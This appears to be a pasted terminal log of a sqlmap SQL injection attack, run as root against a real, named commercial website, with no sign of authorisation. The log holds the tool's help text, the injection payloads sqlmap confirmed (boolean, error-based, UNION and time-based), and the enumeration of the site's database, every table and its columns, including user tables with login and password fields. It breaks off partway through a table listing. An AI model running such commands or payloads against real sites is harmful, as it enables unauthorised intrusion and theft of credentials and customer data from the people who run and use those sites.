
Untitled

a guest
Feb 24th, 2016
  1. Usage: python sqlmap [options]
  2.  
  3. Options:
  4. -h, --help Show basic help message and exit
  5. -hh Show advanced help message and exit
  6. --version Show program's version number and exit
  7. -v VERBOSE Verbosity level: 0-6 (default 1)
  8.  
  9. Target:
  10. At least one of these options has to be provided to set the target(s)
  11.  
  12. -u URL, --url=URL Target URL (e.g. "www.target.com/vuln.php?id=1")
  13. -g GOOGLEDORK Process Google dork results as target URLs
  14.  
  15. Request:
  16. These options can be used to specify how to connect to the target URL
  17.  
  18. --data=DATA Data string to be sent through POST
  19. --cookie=COOKIE HTTP Cookie header
  20. --random-agent Use randomly selected HTTP User-Agent header
  21. --proxy=PROXY Use a proxy to connect to the target URL
  22. --tor Use Tor anonymity network
  23. --check-tor Check to see if Tor is used properly
  24.  
  25. Injection:
  26. These options can be used to specify which parameters to test for,
  27. provide custom injection payloads and optional tampering scripts
  28.  
  29. -p TESTPARAMETER Testable parameter(s)
  30. --dbms=DBMS Force back-end DBMS to this value
  31.  
  32. Detection:
  33. These options can be used to customize the detection phase
  34.  
  35. --level=LEVEL Level of tests to perform (1-5, default 1)
  36. --risk=RISK Risk of tests to perform (0-3, default 1)
  37.  
  38. Techniques:
  39. These options can be used to tweak testing of specific SQL injection
  40. techniques
  41.  
  42. --technique=TECH SQL injection techniques to use (default "BEUSTQ")
  43.  
  44. Enumeration:
  45. These options can be used to enumerate the back-end database
  46. management system information, structure and data contained in the
  47. tables. Moreover you can run your own SQL statements
  48.  
  49. -a, --all Retrieve everything
  50. -b, --banner Retrieve DBMS banner
  51. --current-user Retrieve DBMS current user
  52. --current-db Retrieve DBMS current database
  53. --passwords Enumerate DBMS users password hashes
  54. --tables Enumerate DBMS database tables
  55. --columns Enumerate DBMS database table columns
  56. --schema Enumerate DBMS schema
  57. --dump Dump DBMS database table entries
  58. --dump-all Dump all DBMS databases tables entries
  59. -D DB DBMS database to enumerate
  60. -T TBL DBMS database table(s) to enumerate
  61. -C COL DBMS database table column(s) to enumerate
  62.  
  63. Operating system access:
  64. These options can be used to access the back-end database management
  65. system underlying operating system
  66.  
  67. --os-shell Prompt for an interactive operating system shell
  68. --os-pwn Prompt for an OOB shell, meterpreter or VNC
  69.  
  70. General:
  71. These options can be used to set some general working parameters
  72.  
  73. --batch Never ask for user input, use the default behaviour
  74. --flush-session Flush session files for current target
  75.  
  76. Miscellaneous:
  77. --wizard Simple wizard interface for beginner users
  78.  
  79. [!] to see full list of options run with '-hh'
  80.  
  81. [*] shutting down at 00:04:47
  82.  
  83. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 --dbs
  84.  
  85. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  86. http://sqlmap.org
  87.  
  88. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  89.  
  90. [*] starting at 00:04:53
  91.  
  92. [00:04:53] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  93. Are you sure you want to continue? [y/N] y
  94. [00:04:54] [INFO] testing connection to the target URL
  95. [00:04:55] [INFO] heuristics detected web page charset 'ascii'
  96. [00:04:55] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  97. [00:04:55] [INFO] testing if the target URL is stable. This can take a couple of seconds
  98. [00:04:56] [INFO] target URL is stable
  99. [00:04:56] [INFO] testing if GET parameter 'id' is dynamic
  100. [00:04:56] [INFO] confirming that GET parameter 'id' is dynamic
  101. [00:04:56] [INFO] GET parameter 'id' is dynamic
  102. [00:04:56] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
  103. [00:04:56] [INFO] testing for SQL injection on GET parameter 'id'
  104. heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
  105. do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
  106. [00:05:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
  107. [00:05:25] [WARNING] reflective value(s) found and filtering out
  108. [00:05:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  109. [00:05:35] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
  110. [00:05:37] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
  111. [00:05:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
  112. [00:05:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)'
  113. [00:05:38] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)'
  114. [00:05:38] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause'
  115. [00:05:38] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause'
  116. [00:05:38] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE or HAVING clause' injectable
  117. [00:05:38] [INFO] testing 'MySQL inline queries'
  118. [00:05:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
  119. [00:05:38] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
  120. [00:05:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
  121. [00:05:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
  122. [00:05:39] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
  123. [00:05:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
  124. [00:05:39] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
  125. [00:05:40] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
  126. [00:06:40] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 OR time-based blind' injectable
  127. [00:06:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
  128. [00:06:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
  129. [00:06:44] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
  130. [00:06:52] [INFO] target URL appears to be UNION injectable with 4 columns
  131. [00:06:53] [INFO] GET parameter 'id' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
  132. [00:06:53] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
  133. GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
  134. sqlmap identified the following injection points with a total of 92 HTTP(s) requests:
  135. ---
  136. Place: GET
  137. Parameter: id
  138. Type: boolean-based blind
  139. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  140. Payload: id=-4224 OR (8424=8424)#
  141.  
  142. Type: error-based
  143. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  144. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  145.  
  146. Type: UNION query
  147. Title: MySQL UNION query (random number) - 4 columns
  148. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  149.  
  150. Type: AND/OR time-based blind
  151. Title: MySQL > 5.0.11 OR time-based blind
  152. Payload: id=-4593 OR 5414=SLEEP(5)
  153. ---
  154. [00:07:35] [INFO] the back-end DBMS is MySQL
  155. web server operating system: Windows 2008 R2 or 7
  156. web application technology: ASP.NET, Microsoft IIS 7.5
  157. back-end DBMS: MySQL 5.0
  158. [00:07:35] [INFO] fetching database names
  159. [00:07:37] [INFO] the SQL query used returns 2 entries
  160. [00:07:37] [INFO] retrieved: "information_schema"
  161. [00:07:38] [INFO] retrieved: "artefarma_bdsqlartefarma"
  162. available databases [2]:
  163. [*] artefarma_bdsqlartefarma
  164. [*] information_schema
  165.  
  166. [00:07:39] [WARNING] HTTP error codes detected during run:
  167. 500 (Internal Server Error) - 7 times
  168. [00:07:39] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.artefarma.com'
  169.  
  170. [*] shutting down at 00:07:38
  171.  
  172. root@Gudiofor:~# sqlmap -u http://www.artefarma.com/produtos.php?id=26%27 -D artefarma_bdsqlartefarma --columns
  173.  
  174. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  175. http://sqlmap.org
  176.  
  177. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  178.  
  179. [*] starting at 00:07:58
  180.  
  181. [00:07:58] [WARNING] it appears that you have provided tainted parameter values ('id=26'') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
  182. Are you sure you want to continue? [y/N] y
  183. [00:07:59] [INFO] resuming back-end DBMS 'mysql'
  184. [00:07:59] [INFO] testing connection to the target URL
  185. [00:07:59] [INFO] heuristics detected web page charset 'ascii'
  186. [00:07:59] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
  187. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  188. ---
  189. Place: GET
  190. Parameter: id
  191. Type: boolean-based blind
  192. Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
  193. Payload: id=-4224 OR (8424=8424)#
  194.  
  195. Type: error-based
  196. Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
  197. Payload: id=-6452 OR (SELECT 8984 FROM(SELECT COUNT(*),CONCAT(0x7168617871,(SELECT (CASE WHEN (8984=8984) THEN 1 ELSE 0 END)),0x7179756d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  198.  
  199. Type: UNION query
  200. Title: MySQL UNION query (random number) - 4 columns
  201. Payload: id=-2099 UNION ALL SELECT CONCAT(0x7168617871,0x654d70576654654b7a59,0x7179756d71),1532,1532,1532#
  202.  
  203. Type: AND/OR time-based blind
  204. Title: MySQL > 5.0.11 OR time-based blind
  205. Payload: id=-4593 OR 5414=SLEEP(5)
  206. ---
  207. [00:07:59] [INFO] the back-end DBMS is MySQL
  208. web server operating system: Windows 2008 R2 or 7
  209. web application technology: ASP.NET, Microsoft IIS 7.5
  210. back-end DBMS: MySQL 5.0
  211. [00:07:59] [INFO] fetching tables for database: 'artefarma_bdsqlartefarma'
  212. [00:08:01] [WARNING] reflective value(s) found and filtering out
  213. [00:08:01] [INFO] the SQL query used returns 25 entries
  214. [00:08:02] [INFO] retrieved: "arquivos"
  215. [00:08:03] [INFO] retrieved: "clientes"
  216. [00:08:04] [INFO] retrieved: "contato"
  217. [00:08:05] [INFO] retrieved: "faq"
  218. [00:08:23] [INFO] retrieved: "galeriahome"
  219. [00:08:23] [INFO] retrieved: "galeriainstitucional"
  220. [00:08:24] [INFO] retrieved: "galeriaprodutos"
  221. [00:08:25] [INFO] retrieved: "galeriaprojetosespeciais"
  222. [00:08:30] [INFO] retrieved: "log_acesso"
  223. [00:08:31] [INFO] retrieved: "loja"
  224. [00:08:31] [INFO] retrieved: "loja_imagem"
  225. [00:08:31] [INFO] retrieved: "n_emails"
  226. [00:08:32] [INFO] retrieved: "noticias"
  227. [00:08:32] [INFO] retrieved: "pagclientes"
  228. [00:08:33] [INFO] retrieved: "pagcontato"
  229. [00:08:34] [INFO] retrieved: "paghome"
  230. [00:08:34] [INFO] retrieved: "paginstitucional"
  231. [00:08:34] [INFO] retrieved: "pagorcamento"
  232. [00:08:35] [INFO] retrieved: "pastas"
  233. [00:08:35] [INFO] retrieved: "produto"
  234. [00:08:35] [INFO] retrieved: "produtos"
  235. [00:08:36] [INFO] retrieved: "projetosespeciais"
  236. [00:08:36] [INFO] retrieved: "upload"
  237. [00:08:37] [INFO] retrieved: "usuario"
  238. [00:08:37] [INFO] retrieved: "usuarios"
  239. [00:08:37] [INFO] fetching columns for table 'log_acesso' in database 'artefarma_bdsqlartefarma'
  240. [00:08:38] [INFO] the SQL query used returns 5 entries
  241. [00:08:39] [INFO] retrieved: "log_cod","int(11)"
  242. [00:08:39] [INFO] retrieved: "log_lgn","varchar(45)"
  243. [00:08:40] [INFO] retrieved: "log_dta","datetime"
  244. [00:08:41] [INFO] retrieved: "log_ip","varchar(45)"
  245. [00:08:41] [INFO] retrieved: "log_reg","varchar(500)"
  246. [00:08:41] [INFO] fetching columns for table 'n_emails' in database 'artefarma_bdsqlartefarma'
  247. [00:08:42] [INFO] the SQL query used returns 5 entries
  248. [00:08:42] [INFO] retrieved: "id","int(11)"
  249. [00:08:42] [INFO] retrieved: "nome","varchar(100)"
  250. [00:08:43] [INFO] retrieved: "email","varchar(100)"
  251. [00:08:43] [INFO] retrieved: "codigo","varchar(150)"
  252. [00:08:43] [INFO] retrieved: "ativo","varchar(1)"
  253. [00:08:44] [INFO] fetching columns for table 'galeriaprojetosespeciais' in database 'artefarma_bdsqlartefarma'
  254. [00:08:44] [INFO] the SQL query used returns 5 entries
  255. [00:08:44] [INFO] retrieved: "id","int(11)"
  256. [00:08:45] [INFO] retrieved: "titulo","varchar(100)"
  257. [00:08:45] [INFO] retrieved: "miniatura","varchar(100)"
  258. [00:08:45] [INFO] retrieved: "ampliada","varchar(100)"
  259. [00:08:46] [INFO] retrieved: "idProjeto","int(11)"
  260. [00:08:46] [INFO] fetching columns for table 'upload' in database 'artefarma_bdsqlartefarma'
  261. [00:08:46] [INFO] the SQL query used returns 5 entries
  262. [00:08:46] [INFO] retrieved: "id","int(11)"
  263. [00:08:47] [INFO] retrieved: "name","varchar(45)"
  264. [00:08:47] [INFO] retrieved: "type","varchar(45)"
  265. [00:08:47] [INFO] retrieved: "size","int(11)"
  266. [00:08:48] [INFO] retrieved: "content","mediumblob"
  267. [00:08:48] [INFO] fetching columns for table 'noticias' in database 'artefarma_bdsqlartefarma'
  268. [00:08:48] [INFO] the SQL query used returns 6 entries
  269. [00:08:49] [INFO] retrieved: "id","int(11)"
  270. [00:08:49] [INFO] retrieved: "titulo","varchar(200)"
  271. [00:08:50] [INFO] retrieved: "imagemMiniatura","varchar(200)"
  272. [00:08:50] [INFO] retrieved: "imagemAmpliada","varchar(200)"
  273. [00:08:50] [INFO] retrieved: "resumoNoticia","varchar(500)"
  274. [00:08:51] [INFO] retrieved: "texto","text"
  275. [00:08:51] [INFO] fetching columns for table 'pagclientes' in database 'artefarma_bdsqlartefarma'
  276. [00:08:51] [INFO] the SQL query used returns 2 entries
  277. [00:08:52] [INFO] retrieved: "id","int(11)"
  278. [00:08:53] [INFO] retrieved: "texto","text"
  279. [00:08:53] [INFO] fetching columns for table 'clientes' in database 'artefarma_bdsqlartefarma'
  280. [00:08:53] [INFO] the SQL query used returns 4 entries
  281. [00:08:54] [INFO] retrieved: "id","int(11)"
  282. [00:08:55] [INFO] retrieved: "cliente","varchar(100)"
  283. [00:08:55] [INFO] retrieved: "logo","varchar(100)"
  284. [00:08:56] [INFO] retrieved: "site","varchar(200)"
  285. [00:08:56] [INFO] fetching columns for table 'pastas' in database 'artefarma_bdsqlartefarma'
  286. [00:08:58] [INFO] the SQL query used returns 3 entries
  287. [00:08:58] [INFO] retrieved: "id","int(11)"
  288. [00:08:59] [INFO] retrieved: "nome","varchar(200)"
  289. [00:08:59] [INFO] retrieved: "usuario","int(11)"
  290. [00:08:59] [INFO] fetching columns for table 'loja' in database 'artefarma_bdsqlartefarma'
  291. [00:09:00] [INFO] the SQL query used returns 5 entries
  292. [00:09:00] [INFO] retrieved: "loj_cod","int(11)"
  293. [00:09:02] [INFO] retrieved: "loj_nom","varchar(100)"
  294. [00:09:02] [INFO] retrieved: "loj_end","varchar(300)"
  295. [00:09:03] [INFO] retrieved: "loj_tel","varchar(45)"
  296. [00:09:03] [INFO] retrieved: "loj_frm","int(11)"
  297. [00:09:03] [INFO] fetching columns for table 'projetosespeciais' in database 'artefarma_bdsqlartefarma'
  298. [00:09:04] [INFO] the SQL query used returns 3 entries
  299. [00:09:04] [INFO] retrieved: "id","int(11)"
  300. [00:09:04] [INFO] retrieved: "titulo","varchar(50)"
  301. [00:09:05] [INFO] retrieved: "texto","text"
  302. [00:09:05] [INFO] fetching columns for table 'produto' in database 'artefarma_bdsqlartefarma'
  303. [00:09:05] [INFO] the SQL query used returns 4 entries
  304. [00:09:06] [INFO] retrieved: "prd_cod","int(11)"
  305. [00:09:06] [INFO] retrieved: "prd_nom","varchar(45)"
  306. [00:09:06] [INFO] retrieved: "prd_img","varchar(45)"
  307. [00:09:07] [INFO] retrieved: "prd_dsc","varchar(200)"
  308. [00:09:07] [INFO] fetching columns for table 'pagorcamento' in database 'artefarma_bdsqlartefarma'
  309. [00:09:08] [INFO] the SQL query used returns 2 entries
  310. [00:09:08] [INFO] retrieved: "id","int(11)"
  311. [00:09:09] [INFO] retrieved: "texto","text"
  312. [00:09:09] [INFO] fetching columns for table 'paginstitucional' in database 'artefarma_bdsqlartefarma'
  313. [00:09:09] [INFO] the SQL query used returns 4 entries
  314. [00:09:09] [INFO] retrieved: "id","int(11)"
  315. [00:09:10] [INFO] retrieved: "imgEsquerda","varchar(100)"
  316. [00:09:10] [INFO] retrieved: "tituloTexto","varchar(400)"
  317. [00:09:10] [INFO] retrieved: "texto","text"
  318. [00:09:10] [INFO] fetching columns for table 'produtos' in database 'artefarma_bdsqlartefarma'
  319. [00:09:11] [INFO] the SQL query used returns 3 entries
  320. [00:09:11] [INFO] retrieved: "id","int(11)"
  321. [00:09:11] [INFO] retrieved: "titulo","varchar(50)"
  322. [00:09:12] [INFO] retrieved: "texto","text"
  323. [00:09:12] [INFO] fetching columns for table 'galeriahome' in database 'artefarma_bdsqlartefarma'
  324. [00:09:12] [INFO] the SQL query used returns 4 entries
  325. [00:09:13] [INFO] retrieved: "id","int(11)"
  326. [00:09:13] [INFO] retrieved: "titulo","varchar(200)"
  327. [00:09:13] [INFO] retrieved: "miniatura","varchar(200)"
  328. [00:09:14] [INFO] retrieved: "ampliada","varchar(200)"
  329. [00:09:14] [INFO] fetching columns for table 'pagcontato' in database 'artefarma_bdsqlartefarma'
  330. [00:09:14] [INFO] the SQL query used returns 3 entries
  331. [00:09:15] [INFO] retrieved: "id","int(11)"
  332. [00:09:15] [INFO] retrieved: "texto","text"
  333. [00:09:15] [INFO] retrieved: "mapa","varchar(2000)"
  334. [00:09:16] [INFO] fetching columns for table 'faq' in database 'artefarma_bdsqlartefarma'
  335. [00:09:16] [INFO] the SQL query used returns 3 entries
  336. [00:09:16] [INFO] retrieved: "id","int(11)"
  337. [00:09:17] [INFO] retrieved: "titulo","varchar(200)"
  338. [00:09:17] [INFO] retrieved: "texto","text"
  339. [00:09:17] [INFO] fetching columns for table 'galeriaprodutos' in database 'artefarma_bdsqlartefarma'
  340. [00:09:18] [INFO] the SQL query used returns 5 entries
  341. [00:09:18] [INFO] retrieved: "id","int(11)"
  342. [00:09:18] [INFO] retrieved: "titulo","varchar(100)"
  343. [00:09:19] [INFO] retrieved: "miniatura","varchar(100)"
  344. [00:09:19] [INFO] retrieved: "ampliada","varchar(100)"
  345. [00:09:19] [INFO] retrieved: "idProduto","int(11)"
  346. [00:09:19] [INFO] fetching columns for table 'loja_imagem' in database 'artefarma_bdsqlartefarma'
  347. [00:09:20] [INFO] the SQL query used returns 4 entries
  348. [00:09:20] [INFO] retrieved: "lim_cod","int(11)"
  349. [00:09:21] [INFO] retrieved: "lim_dsc","varchar(45)"
  350. [00:09:21] [INFO] retrieved: "lim_src","varchar(45)"
  351. [00:09:22] [INFO] retrieved: "lim_sup","int(11)"
  352. [00:09:22] [INFO] fetching columns for table 'usuarios' in database 'artefarma_bdsqlartefarma'
  353. [00:09:22] [INFO] the SQL query used returns 4 entries
  354. [00:09:22] [INFO] retrieved: "id","int(11)"
  355. [00:09:23] [INFO] retrieved: "nome","varchar(200)"
  356. [00:09:23] [INFO] retrieved: "login","varchar(100)"
  357. [00:09:24] [INFO] retrieved: "senha","varchar(300)"
  358. [00:09:25] [INFO] fetching columns for table 'galeriainstitucional' in database 'artefarma_bdsqlartefarma'
  359. [00:09:25] [INFO] the SQL query used returns 4 entries
  360. [00:09:25] [INFO] retrieved: "id","int(11)"
  361. [00:09:26] [INFO] retrieved: "titulo","varchar(200)"
  362. [00:09:26] [INFO] retrieved: "miniatura","varchar(100)"
  363. [00:09:26] [INFO] retrieved: "ampliada","varchar(100)"
  364. [00:09:26] [INFO] fetching columns for table 'usuario' in database 'artefarma_bdsqlartefarma'
  365. [00:09:27] [INFO] the SQL query used returns 4 entries
  366. [00:09:27] [INFO] retrieved: "usu_cod","int(11)"
  367. [00:09:28] [INFO] retrieved: "usu_nom","varchar(45)"
  368. [00:09:29] [INFO] retrieved: "usu_pwd","varchar(500)"
  369. [00:09:29] [INFO] retrieved: "usu_tip","int(11)"
  370. [00:09:30] [INFO] fetching columns for table 'arquivos' in database 'artefarma_bdsqlartefarma'
  371. [00:09:30] [INFO] the SQL query used returns 4 entries
  372. [00:09:31] [INFO] retrieved: "id","int(11)"
  373. [00:09:32] [INFO] retrieved: "nome","varchar(200)"
  374. [00:09:33] [INFO] retrieved: "arquivo","varchar(200)"
  375. [00:09:34] [INFO] retrieved: "pasta","int(11)"
  376. [00:09:34] [INFO] fetching columns for table 'contato' in database 'artefarma_bdsqlartefarma'
  377. [00:09:34] [INFO] the SQL query used returns 10 entries
  378. [00:09:35] [INFO] retrieved: "id","int(11)"
  379. [00:09:36] [INFO] retrieved: "telefone1","varchar(13)"
  380. [00:09:36] [INFO] retrieved: "telefone2","varchar(13)"
  381. [00:09:36] [INFO] retrieved: "email","varchar(50)"
  382. [00:09:37] [INFO] retrieved: "endereco","varchar(100)"
  383. [00:09:37] [INFO] retrieved: "numero","varchar(20)"
  384. [00:09:38] [INFO] retrieved: "bairro","varchar(50)"
  385. [00:09:38] [INFO] retrieved: "cidade","varchar(50)"
  386. [00:09:39] [INFO] retrieved: "estado","varchar(2)"
  387. [00:09:40] [INFO] retrieved: "cep","varchar(9)"
  388. [00:09:40] [INFO] fetching columns for table 'paghome' in database 'artefarma_bdsqlartefarma'
  389. [00:09:40] [INFO] the SQL query used returns 5 entries
  390. [00:09:41] [INFO] retrieved: "id","int(11)"
  391. [00:09:42] [INFO] retrieved: "imgDestaque","varchar(100)"
  392. [00:09:42] [INFO] retrieved: "textoDestaque","varchar(200)"
  393. [00:09:42] [INFO] retrieved: "linkDestaque","varchar(300)"
  394. [00:09:43] [INFO] retrieved: "janelaLinkDestaque","varchar(6)"
  395. Database: artefarma_bdsqlartefarma
  396. Table: log_acesso
  397. [5 columns]
  398. +---------+--------------+
  399. | Column | Type |
  400. +---------+--------------+
  401. | log_cod | int(11) |
  402. | log_dta | datetime |
  403. | log_ip | varchar(45) |
  404. | log_lgn | varchar(45) |
  405. | log_reg | varchar(500) |
  406. +---------+--------------+
  407.  
  408. Database: artefarma_bdsqlartefarma
  409. Table: n_emails
  410. [5 columns]
  411. +--------+--------------+
  412. | Column | Type |
  413. +--------+--------------+
  414. | ativo | varchar(1) |
  415. | codigo | varchar(150) |
  416. | email | varchar(100) |
  417. | id | int(11) |
  418. | nome | varchar(100) |
  419. +--------+--------------+
  420.  
  421. Database: artefarma_bdsqlartefarma
  422. Table: galeriaprojetosespeciais
  423. [5 columns]
  424. +-----------+--------------+
  425. | Column | Type |
  426. +-----------+--------------+
  427. | ampliada | varchar(100) |
  428. | id | int(11) |
  429. | idProjeto | int(11) |
  430. | miniatura | varchar(100) |
  431. | titulo | varchar(100) |
  432. +-----------+--------------+
  433.  
  434. Database: artefarma_bdsqlartefarma
  435. Table: contato
  436. [10 columns]
  437. +-----------+--------------+
  438. | Column | Type |
  439. +-----------+--------------+
  440. | bairro | varchar(50) |
  441. | cep | varchar(9) |
  442. | cidade | varchar(50) |
  443. | email | varchar(50) |
  444. | endereco | varchar(100) |
  445. | estado | varchar(2) |
  446. | id | int(11) |
  447. | numero | varchar(20) |
  448. | telefone1 | varchar(13) |
  449. | telefone2 | varchar(13) |
  450. +-----------+--------------+
  451.  
  452. Database: artefarma_bdsqlartefarma
  453. Table: noticias
  454. [6 columns]
  455. +-----------------+--------------+
  456. | Column | Type |
  457. +-----------------+--------------+
  458. | id | int(11) |
  459. | imagemAmpliada | varchar(200) |
  460. | imagemMiniatura | varchar(200) |
  461. | resumoNoticia | varchar(500) |
  462. | texto | text |
  463. | titulo | varchar(200) |
  464. +-----------------+--------------+
  465.  
  466. Database: artefarma_bdsqlartefarma
  467. Table: pagclientes
  468. [2 columns]
  469. +--------+---------+
  470. | Column | Type |
  471. +--------+---------+
  472. | id | int(11) |
  473. | texto | text |
  474. +--------+---------+
  475.  
  476. Database: artefarma_bdsqlartefarma
  477. Table: clientes
  478. [4 columns]
  479. +---------+--------------+
  480. | Column | Type |
  481. +---------+--------------+
  482. | cliente | varchar(100) |
  483. | id | int(11) |
  484. | logo | varchar(100) |
  485. | site | varchar(200) |
  486. +---------+--------------+
  487.  
  488. Database: artefarma_bdsqlartefarma
  489. Table: pastas
  490. [3 columns]
  491. +---------+--------------+
  492. | Column | Type |
  493. +---------+--------------+
  494. | id | int(11) |
  495. | nome | varchar(200) |
  496. | usuario | int(11) |
  497. +---------+--------------+
  498.  
  499. Database: artefarma_bdsqlartefarma
  500. Table: loja
  501. [5 columns]
  502. +---------+--------------+
  503. | Column | Type |
  504. +---------+--------------+
  505. | loj_cod | int(11) |
  506. | loj_end | varchar(300) |
  507. | loj_frm | int(11) |
  508. | loj_nom | varchar(100) |
  509. | loj_tel | varchar(45) |
  510. +---------+--------------+
  511.  
  512. Database: artefarma_bdsqlartefarma
  513. Table: projetosespeciais
  514. [3 columns]
  515. +--------+-------------+
  516. | Column | Type |
  517. +--------+-------------+
  518. | id | int(11) |
  519. | texto | text |
  520. | titulo | varchar(50) |
  521. +--------+-------------+
  522.  
  523. Database: artefarma_bdsqlartefarma
  524. Table: produto
  525. [4 columns]
  526. +---------+--------------+
  527. | Column | Type |
  528. +---------+--------------+
  529. | prd_cod | int(11) |
  530. | prd_dsc | varchar(200) |
  531. | prd_img | varchar(45) |
  532. | prd_nom | varchar(45) |
  533. +---------+--------------+
  534.  
  535. Database: artefarma_bdsqlartefarma
  536. Table: pagorcamento
  537. [2 columns]
  538. +--------+---------+
  539. | Column | Type |
  540. +--------+---------+
  541. | id | int(11) |
  542. | texto | text |
  543. +--------+---------+
  544.  
  545. Database: artefarma_bdsqlartefarma
  546. Table: paginstitucional
  547. [4 columns]
  548. +-------------+--------------+
  549. | Column | Type |
  550. +-------------+--------------+
  551. | id | int(11) |
  552. | imgEsquerda | varchar(100) |
  553. | texto | text |
  554. | tituloTexto | varchar(400) |
  555. +-------------+--------------+
  556.  
  557. Database: artefarma_bdsqlartefarma
  558. Table: produtos
  559. [3 columns]
  560. +--------+-------------+
  561. | Column | Type |
  562. +--------+-------------+
  563. | id | int(11) |
  564. | texto | text |
  565. | titulo | varchar(50) |
  566. +--------+-------------+
  567.  
  568. Database: artefarma_bdsqlartefarma
  569. Table: galeriahome
  570. [4 columns]
  571. +-----------+--------------+
  572. | Column | Type |
  573. +-----------+--------------+
  574. | ampliada | varchar(200) |
  575. | id | int(11) |
  576. | miniatura | varchar(200) |
  577. | titulo | varchar(200) |
  578. +-----------+--------------+
  579.  
  580. Database: artefarma_bdsqlartefarma
  581. Table: pagcontato
  582. [3 columns]
  583. +--------+---------------+
  584. | Column | Type |
  585. +--------+---------------+
  586. | id | int(11) |
  587. | mapa | varchar(2000) |
  588. | texto | text |
  589. +--------+---------------+
  590.  
  591. Database: artefarma_bdsqlartefarma
  592. Table: faq
  593. [3 columns]
  594. +--------+--------------+
  595. | Column | Type |
  596. +--------+--------------+
  597. | id | int(11) |
  598. | texto | text |
  599. | titulo | varchar(200) |
  600. +--------+--------------+
  601.  
  602. Database: artefarma_bdsqlartefarma
  603. Table: galeriaprodutos
  604. [5 columns]
  605. +-----------+--------------+
  606. | Column | Type |
  607. +-----------+--------------+
  608. | ampliada | varchar(100) |
  609. | id | int(11) |
  610. | idProduto | int(11) |
  611. | miniatura | varchar(100) |
  612. | titulo | varchar(100) |
  613. +-----------+--------------+
  614.  
  615. Database: artefarma_bdsqlartefarma
  616. Table: loja_imagem
  617. [4 columns]
  618. +---------+-------------+
  619. | Column | Type |
  620. +---------+-------------+
  621. | lim_cod | int(11) |
  622. | lim_dsc | varchar(45) |
  623. | lim_src | varchar(45) |
  624. | lim_sup | int(11) |
  625. +---------+-------------+
  626.  
  627. Database: artefarma_bdsqlartefarma
  628. Table: usuarios
  629. [4 columns]
  630. +--------+--------------+
  631. | Column | Type |
  632. +--------+--------------+
  633. | id | int(11) |
  634. | login | varchar(100) |
  635. | nome | varchar(200) |
  636. | senha | varchar(300) |
  637. +--------+--------------+
  638.  
  639. Database: artefarma_bdsqlartefarma
  640. Table: galeriainstitucional
  641. [4 columns]
  642. +-----------+--------------+
  643. | Column | Type |
  644. +-----------+--------------+
  645. | ampliada | varchar(100) |
  646. | id | int(11) |
  647. | miniatura | varchar(100) |
  648. | titulo | varchar(200) |
  649. +-----------+--------------+
  650.  
  651. Database: artefarma_bdsqlartefarma
  652. Table: usuario
  653. [4 columns]
  654. +---------+--------------+
  655. | Column | Type |
